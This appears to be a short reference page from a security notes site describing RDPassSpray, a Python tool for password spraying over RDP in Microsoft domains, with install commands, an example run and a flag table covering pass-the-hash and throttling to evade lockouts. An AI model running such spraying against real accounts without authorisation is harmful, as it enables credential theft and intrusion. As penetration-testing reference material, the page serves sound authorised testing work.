CyberNotes
Passwords/Password Cracking

RDPassSpray

RDPassSpray is a Python3 tool designed to perform password spraying attacks in a Microsoft domain environment.

Quickstart

git clone https://github.com/xFreed0m/RDPassSpray.git

  1. pip3 install -r requirements.txt
  2. apt-get install python-apt
  3. apt-get install xfreerdp

Usage

$ python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]

Example

python3 RDPassSpray.py -u victim -p Pass2033! -t 10.10.100.240:3026
FlagDescription
-p/-PSingle password/hash or file with passwords/hashes (one each line)
-t/-TSingle target or file with targets (one each line)
-u/-USingle username or file with usernames (one each line)
--pthSpecify this if the supplied passwords are to be treated as hashes for Pass-The-Hash
-nList of hostname to use when authenticating (more details below)
-oOutput file name (csv)
-sThrottling time (in seconds) between attempts
-rRandom throttling time between attempts (based on user input for min and max values)

Resources

On this page